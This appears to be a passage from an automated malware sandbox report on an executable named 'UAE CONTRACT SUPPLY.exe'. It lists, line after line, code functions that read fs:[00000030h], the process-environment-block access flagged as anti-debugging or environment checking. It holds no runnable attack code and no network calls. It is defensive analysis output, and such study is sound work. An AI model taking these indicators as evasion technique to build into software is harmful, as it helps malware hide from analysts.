Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]		3_2_1E581C06
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]		3_2_1E581C06
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E581C06 mov eax, dword ptr fs:[00000030h]		3_2_1E581C06
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E546C0A mov eax, dword ptr fs:[00000030h]		3_2_1E546C0A
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E546C0A mov eax, dword ptr fs:[00000030h]		3_2_1E546C0A
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E546C0A mov eax, dword ptr fs:[00000030h]		3_2_1E546C0A
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E546C0A mov eax, dword ptr fs:[00000030h]		3_2_1E546C0A
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4FBC2C mov eax, dword ptr fs:[00000030h]		3_2_1E4FBC2C
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E598CD6 mov eax, dword ptr fs:[00000030h]		3_2_1E598CD6
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E5814FB mov eax, dword ptr fs:[00000030h]		3_2_1E5814FB
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E546CF0 mov eax, dword ptr fs:[00000030h]		3_2_1E546CF0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E546CF0 mov eax, dword ptr fs:[00000030h]		3_2_1E546CF0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E546CF0 mov eax, dword ptr fs:[00000030h]		3_2_1E546CF0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4D849B mov eax, dword ptr fs:[00000030h]		3_2_1E4D849B
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E503D43 mov eax, dword ptr fs:[00000030h]		3_2_1E503D43
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E543540 mov eax, dword ptr fs:[00000030h]		3_2_1E543540
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4E7D50 mov eax, dword ptr fs:[00000030h]		3_2_1E4E7D50
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4EC577 mov eax, dword ptr fs:[00000030h]		3_2_1E4EC577
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4EC577 mov eax, dword ptr fs:[00000030h]		3_2_1E4EC577
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E58E539 mov eax, dword ptr fs:[00000030h]		3_2_1E58E539
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E54A537 mov eax, dword ptr fs:[00000030h]		3_2_1E54A537
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E598D34 mov eax, dword ptr fs:[00000030h]		3_2_1E598D34
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F4D3B mov eax, dword ptr fs:[00000030h]		3_2_1E4F4D3B
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F4D3B mov eax, dword ptr fs:[00000030h]		3_2_1E4F4D3B
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F4D3B mov eax, dword ptr fs:[00000030h]		3_2_1E4F4D3B
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]		3_2_1E4D3D34
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]		3_2_1E4D3D34
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]		3_2_1E4D3D34
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]		3_2_1E4D3D34
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]		3_2_1E4D3D34
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]		3_2_1E4D3D34
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]		3_2_1E4D3D34
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]		3_2_1E4D3D34
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]		3_2_1E4D3D34
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]		3_2_1E4D3D34
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]		3_2_1E4D3D34
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]		3_2_1E4D3D34
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4D3D34 mov eax, dword ptr fs:[00000030h]		3_2_1E4D3D34
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4CAD30 mov eax, dword ptr fs:[00000030h]		3_2_1E4CAD30
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E546DC9 mov eax, dword ptr fs:[00000030h]		3_2_1E546DC9
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E546DC9 mov eax, dword ptr fs:[00000030h]		3_2_1E546DC9
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E546DC9 mov eax, dword ptr fs:[00000030h]		3_2_1E546DC9
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E546DC9 mov ecx, dword ptr fs:[00000030h]		3_2_1E546DC9
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E546DC9 mov eax, dword ptr fs:[00000030h]		3_2_1E546DC9
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E546DC9 mov eax, dword ptr fs:[00000030h]		3_2_1E546DC9
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E578DF1 mov eax, dword ptr fs:[00000030h]		3_2_1E578DF1
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4DD5E0 mov eax, dword ptr fs:[00000030h]		3_2_1E4DD5E0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4DD5E0 mov eax, dword ptr fs:[00000030h]		3_2_1E4DD5E0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E58FDE2 mov eax, dword ptr fs:[00000030h]		3_2_1E58FDE2
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E58FDE2 mov eax, dword ptr fs:[00000030h]		3_2_1E58FDE2
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E58FDE2 mov eax, dword ptr fs:[00000030h]		3_2_1E58FDE2
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E58FDE2 mov eax, dword ptr fs:[00000030h]		3_2_1E58FDE2
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4C2D8A mov eax, dword ptr fs:[00000030h]		3_2_1E4C2D8A
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4C2D8A mov eax, dword ptr fs:[00000030h]		3_2_1E4C2D8A
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4C2D8A mov eax, dword ptr fs:[00000030h]		3_2_1E4C2D8A
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4C2D8A mov eax, dword ptr fs:[00000030h]		3_2_1E4C2D8A
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4C2D8A mov eax, dword ptr fs:[00000030h]		3_2_1E4C2D8A
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F2581 mov eax, dword ptr fs:[00000030h]		3_2_1E4F2581
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F2581 mov eax, dword ptr fs:[00000030h]		3_2_1E4F2581
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F2581 mov eax, dword ptr fs:[00000030h]		3_2_1E4F2581
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F2581 mov eax, dword ptr fs:[00000030h]		3_2_1E4F2581
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4FFD9B mov eax, dword ptr fs:[00000030h]		3_2_1E4FFD9B
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4FFD9B mov eax, dword ptr fs:[00000030h]		3_2_1E4FFD9B
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F35A1 mov eax, dword ptr fs:[00000030h]		3_2_1E4F35A1
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E5905AC mov eax, dword ptr fs:[00000030h]		3_2_1E5905AC
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E5905AC mov eax, dword ptr fs:[00000030h]		3_2_1E5905AC
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F1DB5 mov eax, dword ptr fs:[00000030h]		3_2_1E4F1DB5
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F1DB5 mov eax, dword ptr fs:[00000030h]		3_2_1E4F1DB5
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F1DB5 mov eax, dword ptr fs:[00000030h]		3_2_1E4F1DB5
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E554257 mov eax, dword ptr fs:[00000030h]		3_2_1E554257
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4C9240 mov eax, dword ptr fs:[00000030h]		3_2_1E4C9240
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4C9240 mov eax, dword ptr fs:[00000030h]		3_2_1E4C9240
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4C9240 mov eax, dword ptr fs:[00000030h]		3_2_1E4C9240
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4C9240 mov eax, dword ptr fs:[00000030h]		3_2_1E4C9240
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E58EA55 mov eax, dword ptr fs:[00000030h]		3_2_1E58EA55
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E50927A mov eax, dword ptr fs:[00000030h]		3_2_1E50927A
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E57B260 mov eax, dword ptr fs:[00000030h]		3_2_1E57B260
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E57B260 mov eax, dword ptr fs:[00000030h]		3_2_1E57B260
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E598A62 mov eax, dword ptr fs:[00000030h]		3_2_1E598A62
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4D8A0A mov eax, dword ptr fs:[00000030h]		3_2_1E4D8A0A
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E58AA16 mov eax, dword ptr fs:[00000030h]		3_2_1E58AA16
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E58AA16 mov eax, dword ptr fs:[00000030h]		3_2_1E58AA16
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4E3A1C mov eax, dword ptr fs:[00000030h]		3_2_1E4E3A1C
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4CAA16 mov eax, dword ptr fs:[00000030h]		3_2_1E4CAA16
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4CAA16 mov eax, dword ptr fs:[00000030h]		3_2_1E4CAA16
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4C5210 mov eax, dword ptr fs:[00000030h]		3_2_1E4C5210
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4C5210 mov ecx, dword ptr fs:[00000030h]		3_2_1E4C5210
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4C5210 mov eax, dword ptr fs:[00000030h]		3_2_1E4C5210
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4C5210 mov eax, dword ptr fs:[00000030h]		3_2_1E4C5210
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E504A2C mov eax, dword ptr fs:[00000030h]		3_2_1E504A2C
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E504A2C mov eax, dword ptr fs:[00000030h]		3_2_1E504A2C
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F2ACB mov eax, dword ptr fs:[00000030h]		3_2_1E4F2ACB
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F2AE4 mov eax, dword ptr fs:[00000030h]		3_2_1E4F2AE4
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4FD294 mov eax, dword ptr fs:[00000030h]		3_2_1E4FD294
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4FD294 mov eax, dword ptr fs:[00000030h]		3_2_1E4FD294
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4C52A5 mov eax, dword ptr fs:[00000030h]		3_2_1E4C52A5
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4C52A5 mov eax, dword ptr fs:[00000030h]		3_2_1E4C52A5
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4C52A5 mov eax, dword ptr fs:[00000030h]		3_2_1E4C52A5
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4C52A5 mov eax, dword ptr fs:[00000030h]		3_2_1E4C52A5
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4C52A5 mov eax, dword ptr fs:[00000030h]		3_2_1E4C52A5
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4DAAB0 mov eax, dword ptr fs:[00000030h]		3_2_1E4DAAB0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4DAAB0 mov eax, dword ptr fs:[00000030h]		3_2_1E4DAAB0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4FFAB0 mov eax, dword ptr fs:[00000030h]		3_2_1E4FFAB0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E598B58 mov eax, dword ptr fs:[00000030h]		3_2_1E598B58
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4CDB40 mov eax, dword ptr fs:[00000030h]		3_2_1E4CDB40
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4CF358 mov eax, dword ptr fs:[00000030h]		3_2_1E4CF358
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4CDB60 mov ecx, dword ptr fs:[00000030h]		3_2_1E4CDB60
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F3B7A mov eax, dword ptr fs:[00000030h]		3_2_1E4F3B7A
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F3B7A mov eax, dword ptr fs:[00000030h]		3_2_1E4F3B7A
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E58131B mov eax, dword ptr fs:[00000030h]		3_2_1E58131B
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E5453CA mov eax, dword ptr fs:[00000030h]		3_2_1E5453CA
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E5453CA mov eax, dword ptr fs:[00000030h]		3_2_1E5453CA
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4EDBE9 mov eax, dword ptr fs:[00000030h]		3_2_1E4EDBE9
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F03E2 mov eax, dword ptr fs:[00000030h]		3_2_1E4F03E2
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F03E2 mov eax, dword ptr fs:[00000030h]		3_2_1E4F03E2
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F03E2 mov eax, dword ptr fs:[00000030h]		3_2_1E4F03E2
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F03E2 mov eax, dword ptr fs:[00000030h]		3_2_1E4F03E2
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F03E2 mov eax, dword ptr fs:[00000030h]		3_2_1E4F03E2
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F03E2 mov eax, dword ptr fs:[00000030h]		3_2_1E4F03E2
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4D1B8F mov eax, dword ptr fs:[00000030h]		3_2_1E4D1B8F
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4D1B8F mov eax, dword ptr fs:[00000030h]		3_2_1E4D1B8F
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E58138A mov eax, dword ptr fs:[00000030h]		3_2_1E58138A
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E57D380 mov ecx, dword ptr fs:[00000030h]		3_2_1E57D380
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F2397 mov eax, dword ptr fs:[00000030h]		3_2_1E4F2397
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4FB390 mov eax, dword ptr fs:[00000030h]		3_2_1E4FB390
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F4BAD mov eax, dword ptr fs:[00000030h]		3_2_1E4F4BAD
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F4BAD mov eax, dword ptr fs:[00000030h]		3_2_1E4F4BAD
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F4BAD mov eax, dword ptr fs:[00000030h]		3_2_1E4F4BAD
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E595BA5 mov eax, dword ptr fs:[00000030h]		3_2_1E595BA5
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4E0050 mov eax, dword ptr fs:[00000030h]		3_2_1E4E0050
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4E0050 mov eax, dword ptr fs:[00000030h]		3_2_1E4E0050
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E582073 mov eax, dword ptr fs:[00000030h]		3_2_1E582073
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E591074 mov eax, dword ptr fs:[00000030h]		3_2_1E591074
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E547016 mov eax, dword ptr fs:[00000030h]		3_2_1E547016
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E547016 mov eax, dword ptr fs:[00000030h]		3_2_1E547016
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E547016 mov eax, dword ptr fs:[00000030h]		3_2_1E547016
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E594015 mov eax, dword ptr fs:[00000030h]		3_2_1E594015
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E594015 mov eax, dword ptr fs:[00000030h]		3_2_1E594015
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F002D mov eax, dword ptr fs:[00000030h]		3_2_1E4F002D
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F002D mov eax, dword ptr fs:[00000030h]		3_2_1E4F002D
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F002D mov eax, dword ptr fs:[00000030h]		3_2_1E4F002D
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F002D mov eax, dword ptr fs:[00000030h]		3_2_1E4F002D
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F002D mov eax, dword ptr fs:[00000030h]		3_2_1E4F002D
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4DB02A mov eax, dword ptr fs:[00000030h]		3_2_1E4DB02A
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4DB02A mov eax, dword ptr fs:[00000030h]		3_2_1E4DB02A
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4DB02A mov eax, dword ptr fs:[00000030h]		3_2_1E4DB02A
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4DB02A mov eax, dword ptr fs:[00000030h]		3_2_1E4DB02A
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E55B8D0 mov eax, dword ptr fs:[00000030h]		3_2_1E55B8D0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E55B8D0 mov ecx, dword ptr fs:[00000030h]		3_2_1E55B8D0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E55B8D0 mov eax, dword ptr fs:[00000030h]		3_2_1E55B8D0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E55B8D0 mov eax, dword ptr fs:[00000030h]		3_2_1E55B8D0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E55B8D0 mov eax, dword ptr fs:[00000030h]		3_2_1E55B8D0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E55B8D0 mov eax, dword ptr fs:[00000030h]		3_2_1E55B8D0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4C58EC mov eax, dword ptr fs:[00000030h]		3_2_1E4C58EC
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4C9080 mov eax, dword ptr fs:[00000030h]		3_2_1E4C9080
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E543884 mov eax, dword ptr fs:[00000030h]		3_2_1E543884
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E543884 mov eax, dword ptr fs:[00000030h]		3_2_1E543884
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F20A0 mov eax, dword ptr fs:[00000030h]		3_2_1E4F20A0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F20A0 mov eax, dword ptr fs:[00000030h]		3_2_1E4F20A0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F20A0 mov eax, dword ptr fs:[00000030h]		3_2_1E4F20A0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F20A0 mov eax, dword ptr fs:[00000030h]		3_2_1E4F20A0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F20A0 mov eax, dword ptr fs:[00000030h]		3_2_1E4F20A0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F20A0 mov eax, dword ptr fs:[00000030h]		3_2_1E4F20A0
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4FF0BF mov ecx, dword ptr fs:[00000030h]		3_2_1E4FF0BF
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4FF0BF mov eax, dword ptr fs:[00000030h]		3_2_1E4FF0BF
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4FF0BF mov eax, dword ptr fs:[00000030h]		3_2_1E4FF0BF
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E5090AF mov eax, dword ptr fs:[00000030h]		3_2_1E5090AF
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4EB944 mov eax, dword ptr fs:[00000030h]		3_2_1E4EB944
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4EB944 mov eax, dword ptr fs:[00000030h]		3_2_1E4EB944
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4CC962 mov eax, dword ptr fs:[00000030h]		3_2_1E4CC962
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4CB171 mov eax, dword ptr fs:[00000030h]		3_2_1E4CB171
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4CB171 mov eax, dword ptr fs:[00000030h]		3_2_1E4CB171
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4C9100 mov eax, dword ptr fs:[00000030h]		3_2_1E4C9100
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4C9100 mov eax, dword ptr fs:[00000030h]		3_2_1E4C9100
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4C9100 mov eax, dword ptr fs:[00000030h]		3_2_1E4C9100
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4E4120 mov eax, dword ptr fs:[00000030h]		3_2_1E4E4120
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4E4120 mov eax, dword ptr fs:[00000030h]		3_2_1E4E4120
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4E4120 mov eax, dword ptr fs:[00000030h]		3_2_1E4E4120
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4E4120 mov eax, dword ptr fs:[00000030h]		3_2_1E4E4120
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4E4120 mov ecx, dword ptr fs:[00000030h]		3_2_1E4E4120
Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exe	Code function: 3_2_1E4F513A mov eax, dword ptr fs:[00000030h]		3_2_1E4F513A
